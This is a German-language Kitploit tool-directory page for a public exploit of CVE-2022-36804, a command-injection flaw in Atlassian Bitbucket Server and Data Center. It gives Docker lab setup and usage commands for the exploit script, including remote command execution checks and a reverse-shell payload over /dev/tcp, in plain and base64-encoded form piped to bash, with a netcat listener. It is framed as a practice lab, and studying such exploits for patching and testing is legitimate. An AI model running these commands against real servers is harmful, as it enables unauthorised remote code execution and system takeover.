Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 | Kitploit
Tools/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLabs & Praxis
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Atlassian-Bitbucket-Server-CVE-2022-36804

In mehreren API-Endpunkten des Atlassian Bitbucket Server und Data Center wurde eine kritische Command-Injection-Schwachstelle gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> und <8.3.1> veröffentlicht wurden.

Labor für CVE-2022-36804

Docker-Image bauen

root@kitploit:~
docker build -t bitbucket .

Docker ausführen

root@kitploit:~
docker run -it bitbucket

Verwendung von cve-2022-36804.py

Auf Remote Code Execution (RCE) prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Auf RCE mit angepasstem Befehl prüfen (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Auf RCE mit angepasstem Befehl, Projektschlüssel und Repository-Namen prüfen

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Shell mit netcat erhalten

Ersetzen Sie 172.17.0.3 durch Ihre lokale IP-Adresse

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Netcat-Listener starten mit:

root@kitploit:~
nc -lvp 4444

Reverse-Shell online : https://www.revshells.com

root@kitploit:~
Convert `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` to base64 in case of payload execution error. 

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Es wird empfohlen, eine verwundbare Version des Bitbucket-Servers auf einem Windows-/Linux-Rechner für Übungszwecke zu installieren. Es ist einfacher, eine Reverse-Shell zu erhalten als mit Docker-Images.

Weitere Informationen finden Sie [hier](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Referenzen
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Tool herunterladen